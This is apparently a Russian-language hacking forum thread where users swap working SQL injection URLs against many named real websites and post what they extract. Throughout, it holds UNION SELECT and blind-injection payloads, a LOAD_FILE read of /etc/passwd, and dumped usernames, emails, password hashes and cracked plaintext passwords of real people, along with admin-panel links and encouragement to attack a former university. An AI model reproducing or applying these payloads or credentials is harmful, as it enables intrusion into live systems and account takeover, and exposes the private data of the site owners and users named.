http://www.zdee.com/board/subj.php?id=9999999+union+select+1,2,3,password,5, 6,7,8,9,10,11,12+from+user/*

terrapinstats.com

http://www.terrapinstats.com/profile.php?playerid=-1%20union%20select%201,2,3,4,5,6,7--
http://www.terrapinstats.com/profile.php?playerid=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5,6,7--
terps@localhost:5.0.37-standard-log:terps
http://www.terrapinstats.com/profile.php?playerid=-1%20union%20select%201,concat(user_name,0x3a,user_ email,0x3a,user_password),3,4,5,6,7+from+4images_u sers--
jjs6791:admin@yourdomain.com:52bd43d37ed62eb4c226e 31841bc03dc
jjs6791:moses

playersown.com.au

http://www.playersown.com.au/playersagency.php?playerId=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5,6,7--
playerso_players@localhost:4.1.22-standard:playerso_players

http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/*

http://www.trader.poltav.com/index.php?action=show&w_sh=course&show_cour=-20+union+select+concat(version(),0x3a,user(),0x3a, database())/*

5.0.45-community-log:kaurovev_roottra@localhost:kaurovev_trader

страя версия сайта.. но может быть и к новому пароли подойдут =\
=======================================
http://www.listmet.ru/news.php?act=news_by_id&news_id=106+union+select+1,version(),3,4,5,6,7/*

версия 4.1.22

armorysq.net
http://armorysq.net/main/shopping.php?id=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26/*
VERSION: 5.0.27-standard-log
USER: armorysquare@76.12.13.92
DATABASE: armorysquare

fx-mm.com
http://www.fx-mm.com/index.php?id=99999+union+select+1,2,3,4,VERSION(), 6,7,8,9,10,11,12,13,14,15/*
VERSION: 5.0.22-max-log
USER: evolution@web7.srv.host-it.co.uk
DATABASE: evolution

http://agroferma.com/client/news.php?id=-46+union+select+1,2,5,4,5,5,concat_ws(0x3a,user(), database(),version()),8/*

agri_db0@88.214.192.30
agri_db0
4.0.27

http://www.sbornaya.kz/articles/text/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+/*
только что-то version() и user() не хотят работать

http://www.sbornaya.kz/articles/text/?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t_ws(0x3a,version(),database(),user()),1),1),5,6,7 ,8,9,10,11,12,13,14+/*

www.biomusic.ru

http://www.biomusic.ru/album.php?id=15819%20and%201=0%20union%20select%20 1,2,3,4,5,6,7,concat_ws(0x3a,user_pass,email),9,10 ,11,12,13%20from%20users%20limit%202,1--

админка:
http://www.biomusic.ru/admin.php



mp3.volpi.ru

http://mp3.volpi.ru/view.php?id=3893%20and%201=0%20union%20select%201, concat(user,char(58),password),3,concat(user,char( 58),password),5,4,7,8,9,10,11,12,13%20from%20mysql .user--

http://www.regioninfo.ru/pfolioss.php?key_site=-1+union+select+1,concat(version(),user(),database( )),3,4,5,6,7,8,9,10,11+/*

4.0.24-standard-log
salutaru_regi@localhost
salutaru_regi

SIdoy
1-www.biomusic.ru Баян
2-mp3.volpi.ru Баян

http://www.procuror.kz/?iid=-1+union+select+1,concat(user(),char(58),version(), char(58),database()),3,4,5,6,7,8+/*

Сам не ломал и вам не советую, ПРОКУРАТУРА БЛИН! ))))

http://www.nmmra.org/e-newsletters.php?id=-9+union+select+1,database(),version(),4,5,6,7,8,9, 10,11,user()/*
nmmra@localhost
nmmra
4.1.20

Украинская авто газета

autoua.biz

_http://www.autoua.biz/org.php?id=-219+union+select+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENC RYPT(concat(user(),char(58),version(),char(58),dat abase(),0x71),0x71),9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 ,53,54,55,56,57,58/*

autoua@localhost:4.1.18:autoua-market

_http://www.autoua.biz/org.php?id=-219+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_enc rypt(user,0x71),0x71),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58+from+mysql.user+limit+2,10/*

root:*7DD915644D68E76435D36103BF2BB41D50B337A6

блин 55 столбцов беда,кстати user и password вместе не выводит,что это может быть?

steambans.com

http://steambans.com/launchserver.php?id=104739%20and%201=2%20UNION%20A LL%20SELECT%20concat(username,0x3a,password),2,3,4 ,5+from+site_users+where+user_id=2--
D_DK:D_DK@steambans.com:72e8f146d1499be218eb6f80f5 30bacd

:) :) :)

4.1.22
telgaz_db
telgaz_mysql@212.193.227.34
http://9955599.ru/mo_job.php?mo=sect&Id=-19+UNION+SELECT+1,2/*

http://www.naturamunda.lt
http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,version(),8,9/*
tarpininka_nm@localhost
5.0.45-community-log

Идем дальше:
http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,TABLE_NAME,8, 9+from+

INFORMATION_SCHEMA.TABLES/*
30 таблиц, среди них:
users_db
personalas
user_privileges и др.


http://sperling-coll.dk
http://sperling-coll.dk/?filenavn=varer.php4&traeid=-1+union+select+concat_ws(char(58),user(),version() ,database())/*
И читаем титул:
Sperling - root@localhost:5.0.27:dbsperlingNY
Думаю, проблем быть не должно =)

А это Вам на съедение:
http://www.hajosalfred.hu/eng/news.php?id=-1+union+select+1,2,3,4,5+--+=)

http://www.milon.ru/index.phtml?id=-6+union+select+1,LOAD_FILE(char(47,101,116,99,47,1 12,97,115,115,119,100)),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20/*


http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x 71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20/*

Хеш рута вытащить не смог.

MegaBits
Вот рут ,но так-же как в моём предъидущем посте не всё понятно
root:032c41e8435273a7 =letmein
Запрос :
_http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0x71 ),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20+from+mysql.user+limit+3,10/*
или user или password вместе нет

http://www.omantribune.com/index.php?page=news&id=99999+union+select+1,2,3,4,5,6,7,8,9/*

omantribune@p3slh024.shr.phx3.secureserver.net:oma ntribune:4.1.22-max-log



http://www.turkystan.kz/page.php?page_id=14&number_id=99999+union+select+1,2,3,4/*

turkesdb@hosting:turkesdb:4.1.22

http://www.m-logos.ru/seminars/info.phtml?id=-727+union+select+1,2,3,4,concat_ws(char(58),user() ,version()%20%20,database()),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20/*
mlogos@zvm8.host.ru:4.0.27-log:mlogos

Только учусь!!!
shop notebook.dn.ua

http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,versio n(),0x3a,user())/*

godnua_newmarket:4.1.20:godnua_mark@localhost

http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(fio,0x3a,mail)/**/from/**/users/*
-------------------------------------------------
там еще есть таблицы, но нужно подбирать

arm.st.uz
_http://arm.st.uz/index.php?m=news&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
4.1.19-log:arm@localhost:arm
admin:70222949cc0db89ab32c9969754d4758 pass:1290
sk:70222949cc0db89ab32c9969754d4758 pass:1290
arm:5bbc7cc2da7217ccaf66f733b3fef728 pass:11183 kara-su2apm@mail.ru pass:11183

в админку не пускает, стоит привязка к ипу

http://9955599.ru/jobsect.php?section=-5+union+select+null,version()/*
telgaz_mysql@212.193.227.34/4.1.22/telgaz_db
если ктонить раскоыряет напишите плиз чтото у меня не получилось дальше((

Lamersha, по-моему, там нет ничего интересного

resume
id
name
pay
mark
date
city
section
age
vacancy
id
city
section

Хотя хз, мне лень дальше ковырять =)

PRIAMOS is a powerful SQL Injector & Scanner

www.priamos-project.com/whatis.htm

http://www.dixis.kz/index.php?shownews=true&nid=all&cat=-1+union+select+1,2,concat(version(),char(58),user( ),char(58),database()),4,5,6,7,8,9,10+/*

4.1.22-standard-log
dixis_user@localhost
dixis_shop

upc.edu
http://www.upc.edu/tercercicle/estudis/index_ambit.php?id_ambit=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database())/*
4.0.24_Debian-10sarge1-log:intranet@localhost:tercercicle intranet@localhost

Ну могу докрутить эти скули, вроде выводиться, а инфу показываеть не хочет
library.uiuc.edu
http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+123--

spo.princeton.edu
http://spo.princeton.edu/index.php?id=-1'+or+1=1/*

ethology.ru

http://ethology.ru/humor/?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database())/*

5.0.45-log:u12802@10.10.10.213:u12802

ethology_authors
id
lastname
firstname
middlename
fmname
biogr
ethology_encycl
ethology_english
ethology_forum
ethology_forum_theme
ethology_gbook
ethology_gbook_theme
ethology_humor
ethology_interview
ethology_lection
ethology_library
ethology_links_sites
ethology_news
ethology_other
ethology_phorum_theme
ethology_sitenews
ethology_theme
ethology_users
id
name
email
login
passwd
status
id_person

alex pass:11 info@ethology.ru
pass:183
mike:183:potapovs@sibmail.ru
prox:124:tv_bio@mail.ru
gilburd:1324:ogil@bk.ru
voronova:23454:voronoff@list.ru
labas:5321:labas33@mail.ru
protopopov:5463:protopop@hotbox.ru
Danio:1098:sher@ukrcsm.kiev.ua
irina:4359:charina222004@yahoo.com
grebenshikov:36574:grevo@cv.ukrtel.net
gerbek:gerbek123:yuryh@rambler.ru

2 gibson

Первая:

_http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+@@version--

Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

_http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema .tables--

SoyLinks
NewLinksSoy
NewLinksCorn

_http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema .tables+WHERE+TABLE_NAME+NOT+IN+('SoyLinks','NewLi nksSoy')--
и т.д. мне дальше лень
---------------------------
вторая:mysql

_http://spo.princeton.edu/index.php?id=1'+order+by+23/*

Скорее всего два Select столбца 23 ,а через Union ругается:

The used SELECT statements have a different number of columns

т.е. подзапросы

http://www.cyberbody.ru/shop.php?catid=1121000000000+UNION+SELECT+1,concat _ws(0x3a,username,user_password,user_email,user_ic q),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32+from+phpbb2_us ers/*
все качки на одной страничке)))

http://www.nsastutter.org/content/index.php?catid=-52/**/union/**/select/**/1,concat_ws(0x3a,User(),Database(),Version()),3,4, 5/*

stutter@10.225.135.70
stutter
4.0.25-standard-log

Киевский Рок Клуб
http://www.rock.kiev.ua/arhiv/id.php?id=-99999+union+select+1,2,3,concat_
ws(0x3a,id,login,password,fname,lname,email),5,6,7 ,8,9,10,11+from+users/*

USER: rock@localhost
VERSION: 5.0.32-Debian_7etch5-log
DATABASE: rock

1: DR-1:AkbcA:Ремиш:Дмитрий:rock.kiev.ua@gma il.com
28:YK-1:nbyedbtkm:Юлия:Коломиец:news@rock.ki ev.ua
1657:YK-10:7qOAjTq6dN26udL:Комаров:Юрий:design@ rock.kiev.ua

Регистрация и админка тут:
http://www.rock.kiev.ua/kontakt/index.php

банк
••••••••••••
http://www.psib.ru/news.php?year=-99999999999999+union+select+version()/*
••••••••••••
версия 4.1.18
••••••••••••
пользователь anthost@webhosting-bix.hc.ru
••••••••••••
база wwwant_hostnet_antcatalogs
••••••••••••
дерзайте ;)
====================
http://www.781313.ru/firm_list.php?cid=-40+union+select+concat(version(),0x3a,user(),0x3a, database()),2/*
4.1.22:h781313@localhost:www781313ru

[PNphpBB2]
table pn_phpbb_users:
_http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,table_name,5,5,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/and/**/table_name/**/like/**/0x257573657225/**/limit/**/3,1/*

column username:
_http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257573657225/**/limit/**/1,1/*

column user_password:
_http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257061737325/**/limit/**/0,1/*

THE END:
_http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,concat(0x3C62722F3E,0x6964,0x3A,user_id,0x3C6272 2F3E,0x75736572,0x3A,username,0x3C62722F3E,0x70617 373,0x3A,user_password),5,5,5/**/from/**/pn_phpbb_users/**/WHERE/**/user_id=2/*

Для "поклонников" Metallica...

www.metpage.de

http://www.metpage.de/news/index.php?id=999')+union+select+1,2,3,4,5,6,7,8,us er(),version(),database(),12,13,14,15,16,17,18,19, 20,21/*

metnews@localhost:5.0.20-max-log:metnews

Доступна таблица wn_user:

Tommy:3fac1eead50fcb46ec56e0df6452251e:suku3s43
FrayedEnd:455018c4669f687ff757ffd4be3045cb:sebsuck s
TheUnforgivenII:e93ac9964ed9c0444cfbfa9f8a26429a:m etfan6
Elloy:c76f54e8d0db01297ac7a2e47be4cf13

P.S. Пассы расшифровал с помошью md5.xek.cc (http://md5.xek.cc), пользуемся...

http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(user(),char(58),versio n(),char(58),database()),5,6,7,8,9,10,11,12,13,14, 15+from+admin/*

vmovkkz_1@localhost
4.1.22-standard-log
vmovkkz_1
---------------------------------------------------

http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(id,char(58),login,char (58),password),5,6,7,8,9,10,11,12,13,14,15+from+ad min/*

id:1
login:admin
passord:admin

http://www.vmo.kz/admin.php

http://softnew.ru/

http://softnew.ru/news/index.phtml?r=13&id=-259524+union+select+1,2,3,4,5,6,7,concat(user,pass word)+from+mysql.user+limit+0,1/*

ftp.mcs.com

http://ftp.mcs.com/site.php?page=-1'+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(
),database()),6,7,8/*

4.1.20:apache@localhost:mcsnew2

ecoinnovation.co.nz

http://www.ecoinnovation.co.nz/product.php?group=-1+union+select+1,2,concat_ws(0x3a,vers

ion(),user(),database()),4,5/*

5.0.41-Dotdeb_1.dotdeb.2-log:ecoinnovation@localhost:ecoinnovation

contact
dynNavBar
eco_pfront
ecolink
ecolink_cat
ecolink_group
ecolinkbycat
ecoprod_cat
ecoprod_group
ecoprodbycat
ecoproducts
qa
searches
users
id
username
pass
first
last
email

mrllkl4544:66228d04224d8739:ecoinn@paradise.net.nz
powerman:66228d04224d8739:a@a.com

Антибоян обновлен, спасибо Ro man и gibson. незабываем проверять на боянность свои скули http://filefront.jino-net.ru/sql.html

не всем повело как мне . скуль иньекция на сайте моего бывшего универа)))зря они мен исключили за многократное появление в нетрезвом состоянии))

http://tsu.tmb.ru/ru/main.php?put=ob_yniv/struct_podr/
inst_filologii/dikkens&middle=conferenses/index&conf_id
=1+union+select+1,version(),3/*

учудите плиз с этим гадюшником не ценящий психоделического движения киберпанконаркоманов

Ps одна девчонка из этого универа с 5 того курса встречалась со мной незная что я на 1вом))) бугага

Передаю привет компании НИНСИС

http://www.avapeter.ru/content.php?id=3&iddop=-5'+union+select+version()/*
\4.1.22-log:root@localhost:dbava\
нашел, смотрю в низу кто наваял сайт.. в итоге вот что:

http://www.ninsis.ru/content.php?id=-15'+union+select+version()/*

\4.1.22-log:root@localhost:dbninsis\
хотя, может ничего страшного =\
ninsis.ru/content.php?id=50 список клиентов
===================================

еще один пламенный привет Global Site Group

http://g-site.ru/portfolio.php?id=-162+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.22-standard:gsgroup_super@global.globalsitegroup.ru:g sgroup_toli

таблички некогда подбирать =\

http://www.paradigma.kz/index.php?part=info&article_type_id=-1+union+select+1,concat(user(),char(58),version(), char(58),database()),3,4,5,6,7,8,9,10,11,12,13+/*

u10639@10.10.223.223
5.0.45-log
u10639

truelamer
В антибояне её нет ,а тут есть:
google
paradigma.kz site:forum.antichat.ru
так что 11100000

http://www.sbornaya.kz/news/view/?newsid=-1+union+select+1,2,3,4,5,6,7,8,aes_decrypt(aes_enc rypt(concat(version(),char(58),user(),char(58),dat abase()),1),1),10,11,12,13,14,15+/*

4.1.13
sbornaya@server5.barik.pp.ru
sbornaya

http://www.beton.ru/center.php?chp=showpage&parent=799&num=
1+union+select+1,2,3333333,4,5,66666,7,8,9,10,11/*

эх фильтрация

http://www.loverland.ru/addbasket.php?action=add&id=-1+union+select+concat(user(),char(58),version(),ch ar(58),database())/*

loverland@localhost
5.0.41
loverland

http://www.beton.ru/center.php?chp=showpage&parent=799&num=
1+union+select+1,2,3333333,4,5,66666,7,8,9,10,11/*

эх фильтрация


http://www.beton.ru/center.php?chp=showpage&parent=799&num=%20%201+union+select+1,2,aes_decrypt(aes_encry pt(concat(version(),char(58),database(),char(58),u ser()),1),1),4,5,66666,7,8,9,10,11/*

4.1.15mysql-other-log
beton
beton@10.248.34.9

http://www.beton.ru/center.php?chp=showpage&parent=799&num=%20%201+union+select+1,2,concat(login,char(58) ,password),4,5,66666,7,8,9,10,11+from+users+limit+ 0,1+/*

truelamer
ты издеваешься что-ли?
Твой-же пост
_http://forum.antichat.ru/showpost.php?p=611481&postcount=5072
_http://forum.antichat.ru/showpost.php?p=611487&postcount=5073
Это тоже баян
_http://forum.antichat.ru/showpost.php?p=536081&postcount=4190

Все ошибку понял теперь буду повнимательней

truelamer
хех а
http://www.beton.ru/center.php?chp=showpage&parent=799&num=1+union+select+1,2,database(),4,5,6,7,8,9,10,1 1/*
выполнить неполучается

truelamer
хех а
http://www.beton.ru/center.php?chp=showpage&parent=799&num=1+union+select+1,2,database(),4,5,6,7,8,9,10,1 1/*
выполнить неполучается


Надо так:

http://www.beton.ru/center.php/?chp=showpage&parent=799&num=1+union+select+1,2,aes_decrypt(aes_encrypt(con cat(database()),1),1),4,5,66666,7,8,9,10,11/*

ок спасибо понял

http://www.agun.kz/?type=news&id=-1+union+select+1,2,3,4,concat(user(),char(58),vers ion(),char(58),database()),6,7,8+/*

alarko@localhost
4.1.22
wwwalarkokz

http://www.kaznpu.kz/kz/?annons=-1+union+select+concat(version(),char(58),user(),ch ar(58),database())+/*

http://www.kaznpu.kz/kz/?annons=-1+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+20,1/*

Почему вот этот не проходит: http://www.kaznpu.kz/kz/?annons=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=moderator+limit+0,1/*

http://www.kaznpu.kz/kz/?annons=-1+union+select+login+from+moderator/*

login: muha

www.adams-motors.ru

http://www.adams-motors.ru/new.php?id=30000000+UNION+SELECT+concat_ws(0x3a,us er_id,username,user_password,user_email,user_icq), 2,3+from+phpbb_users+limit+1,1/*

2:admin:178f6c2365ac7511b4bf37c8e89cc678(aldus885) :info@art.su:
пасс на plain-text.info расшифровал за 10 сек
=======================================
www.elysium.nnov.ru сайт рок-группы Элизиум вроде
http://www.elysium.nnov.ru/news/arc.php?id=136780000000+UNION+SELECT+0x74686174206 17265206675636B2121,2,3/*
http://www.elysium.nnov.ru/news/arc.php?id=136780000000+UNION+SELECT+concat_ws(0x3 a,version(),user(),database()),2,3/*
5.0.45-log:elysium.nnov.ru@localhost:elysium
есть таблички jos_users и users

http://www.design.upenn.edu/new/about/newsdetail.php?nid=99999+union+select+1,2,concat(v ersion(),char(58),user(),char(58),database()),4,5, 6,7,8,9,10,11+/*

4.1.20
penndesign@localhost
PennDesign

_http://www.alpha.perm.ru/iaproject/txt.php?n=-1+union+select+1/*

_http://www.fishery.ru/
_http://www.fishery.ru/news/index.php?id=11687#11687
_http://www.fishery.ru/news/index.php?id=11687%27#11687
_http://www.fishery.ru/news/index.php?id=11687+order+by+7/*#11687
_http://www.fishery.ru/news/index.php?id=-11687+union+select+1,2,3,4,5,6,7/*#11687
_http://www.fishery.ru/news/index.php?id=11687+union+select+1,database(),user( ),4,5,version(),7/*#11687

database - fishery
user - fishery@localhost
version - 5.0.45-community-log

23:catalogcontent
23:--1:user
23:--2:pswd
23:--3:companyname
23:--4:postaddress
23:--5:address
23:--6:phone
23:--7:fax
23:--8:city
23:--9:email
23:--10:namedomain
23:--11:contactname
23:--12:comment
23:--13:file1
23:--14:file2
23:--15:url
23:--16:file3
23:--17:file1name
23:--18:file2name
23:--19:file3name
23:--20:file1desc
23:--21:file2desc
23:--22:file3desc
23:--23:file1date
23:--24:file2date
23:--25:file3date
23:--26:file1size
23:--27:file2size
23:--28:file3size
23:--29:file1count
23:--30:file2count
23:--31:file3count
23:--32:viewcat
23:--33:viewsite
23:--34:uid
23:--35:subscribe
23:--36:created
23:--37:money_amount
23:--38:enabled


26:forums_auth
26:--1:sess_id
26:--2:name
26:--3:username
26:--4:password
26:--5:email
26:--6:webpage
26:--7:image
26:--8:icq
26:--9:aol
26:--10:yahoo
26:--11:msn
26:--12:jabber
26:--13:signature

первая десятка:
fish:death:fishmonger@mail.ru
lopantsev:uhzpyjd:lopantsev@mail.iks.ru
континент:континент:rkms@mail.ru
bioacoustik:123321:sales@bioacoustik.ru
Vostok Trust:astra57126:ankor.ltd@bk.ru
olecia:fortuna:logist4@fortlog.ru
sakhtot:bihkek:contrakt-s@bk.ru
0000y:00000:yuksf@rambler.ru
norvik:77777:norvik@bk.ru
present:dasha:present@front.ru

первая 10 с форума.

mnt:542034e38fc03450534f2400649c6ba8
fishmonger:2e8d6dbf9112a879d4ceb15403d10a78
msk.omsk:60bdd6c1e11766886e1275dccec940b8
iv_mihailov:a82d922b133be19c1171534e6594f754
hantrade:0004d0b59e19461ff126e3a08a814c33
tarakan:adb97c291e3725d0f1a76cd2c6c14673
flimpy:fa112890762d8ed70e46ee42b11b55f1
red:827ccb0eea8a706c4c34a16891f84e7b
bruja:6bfb02b76ad8bed2bec95a2282c9cae6
dinamit:48bde11a4f202709aaad3e58f24d71eb

http://gol.sao.mos.ru/news_full.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat( version(),0x3a,user(),0x3a,database()),0x71),0x71) ,4,5/*
вроде, не баян.

http://www.satdv.net.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.aloris.ru/http://www.tatshop.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://kneparhia.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://glasstable.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.usms.org/articles/articledisplay.php?a=-150'+union+select+1,2,3,4,5,6,7,8,9/*
name=usms_main
dbver=5.0.27-standard
user=usms_rw@172.16.1.1
таблы так и не осилил :)

Мой первый скуль в топике:

http://www.speedguide.net/read_articles.php?id=-174+union+select+1,2,concat(user,password),4,5+fro m+mysql.user--

ЦЕЛЬ: http://www.fnm.msu.ru
УЯЗВИМОСТЬ: BLIND SQL INJ
ГДЕ: http://www.fnm.msu.ru/main.php?topic=1 and 1=1
ЭКРАНИРОВАНИЕ СПЕЦСИМВОЛОВ: ДА
ВЕРСИЯ MySQL: 5.0.24a-Debian_9-log
НАЛИЧИЕ INFORMATION_SCHEMA: ДА
ТАБЛИЦЫ: CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
doc_folders
documents
indexim
sessions
subtopics
topics
users

А дальше - сами=)

http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(con cat(version(),0x3a,user(),0x3a,database()),0x71),0 x71),6,7/*
не баян (:

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--

PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--

выводит много интересного, но я выбрал pg_user

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--

результат:

usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--


первый это админ
login: postgres
pass: ********

Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....

www.tungus.ru

http://www.tungus.ru/views.php?id=791000+union+select+1,2,3,concat_ws(0 x3a,user,pass),5,6,7,8+from+users/*
бугага, смотрим в свойтва рисунка
nitros911:ujkfz;jgf голаяжопа :D
идем в админку
http://www.tungus.ru/admin.php правильно, и админим

куча обоев для рабочего стола скачать (http://sosny.net/modules/wp.tar.gz) 250 мб

http://www.kalm.ru/ru/docs_view.php?id=-1+union+select+1,2,3,4,concat(version(),char(58),d atabase(),char(58),user()),6,7,8+--

4.0.16-log
kalm_ru
kalm@localhost

http://www.iwdp.co.uk/profile.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10,11/*
VERSION: 4.1.20
DATABASE: iwdp
USER: iwdp@localhost

http://www.eipcprograms.com/product.php?id=9999+union+select+1,VERSION(),3,4,5 ,6,7,8,9,10,11,12,13/*
VERSION: 5.0.24a-log
DATABASE: d60350056
USER: u70382875@cgihost

2 cash$$$
Два баяна
_http://forum.antichat.ru/showpost.php?p=594249&postcount=981
_http://forum.antichat.ru/showpost.php?p=577278&postcount=4680

рейтинг игроков в теннис
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'

перебераем таблы
http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NO T+IN+('plyrbioHTML','ContestInfo_bak','rankdates', 'SQLINJECTION','rankmast','RollingRank','sglbest14 ','PlayerEquip','sglbest14roll','sglmtchfact','Pla yerEquip_backup','ClipBTournEntryPossibles','cntry mast','cntrymast_Latino','ContestInfo','dblbest14' ,'dblbest14roll','dblno1plyr','dblrndrsl','dblrndr slXX','dbltrnrsl','dbltrnrslroll','dblwinstreak',' dtproperties','DW_EventHistoryByTrnYearTrnNum','DW _SglRaceRankByCountry','emailtemp','ENTY_PlayerPro perty'))
все лень было перебирать
plyrbioHTML',
'ContestInfo_bak',
'rankdates'
,'SQLINJECTION',
'rankmast','RollingRank',
'sglbest14','PlayerEquip',
'sglbest14roll','sglmtchfact',
'PlayerEquip_backup',
'ClipBTournEntryPossibles',
'cntrymast','cntrymast_Latino',
'ContestInfo',
'dblbest14',
'dblbest14roll',
'dblno1plyr','dblrndrsl',
'dblrndrslXX'
,'dbltrnrsl','dbltrnrslroll',
'dblwinstreak',
'dtproperties','DW_EventHistoryByTrnYearTrnNum',
'DW_SglRaceRankByCountry'
,'emailtemp'
,'ENTY_PlayerProperty

берем таблицу перебираем столбцы для примера plyrbioHTML
